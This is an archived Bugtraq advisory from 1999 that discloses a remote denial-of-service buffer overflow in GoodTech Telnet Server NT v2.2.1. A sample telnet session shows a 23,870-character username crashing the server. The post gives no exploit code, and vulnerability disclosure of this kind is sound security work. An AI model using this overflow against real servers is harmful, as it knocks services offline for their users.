Home page logo
/

bugtraq logo Bugtraq mailing list archives

Remote DoS Attack in GoodTech Telnet Server NT v2.2.1 Vulnerability
From: labs () USSRBACK COM (Ussr Labs)
Date: Mon, 6 Dec 1999 03:18:18 -0300


Remote DoS Attack in GoodTech Telnet Server NT v2.2.1 Vulnerability

PROBLEM

UssrLabs found a Remote DoS Attack in GoodTech Telnet Server NT v2.2.1,
the buffer overflow is caused by a long user name 23870 characters.

There is not much to expand on.... just a simple hole

Example:
[gimmemore () itsme]$ telnet example.com
Trying example.com...
Connected to example.com.
Escape character is '^]'.

Welcome to GoodTech Telnet Server for Windows NT (V2.2) (Evaluation Copy)

(C) Copyright 1996-1999 GoodTech Systems, Inc.

Login username: (buffer)

Overflow Crashh.

Where (buffer) is 23870 characters.

Vendor Status:
Contacted.

Vendor   Url: http://www.goodtechsys.com/
Program Url: http://www.goodtechsys.com/products.htm

Credit: USSRLABS

SOLUTION
    Nothing yet.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com


  By Date           By Thread  

Current thread:
  • Remote DoS Attack in GoodTech Telnet Server NT v2.2.1 Vulnerability Ussr Labs (Dec 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault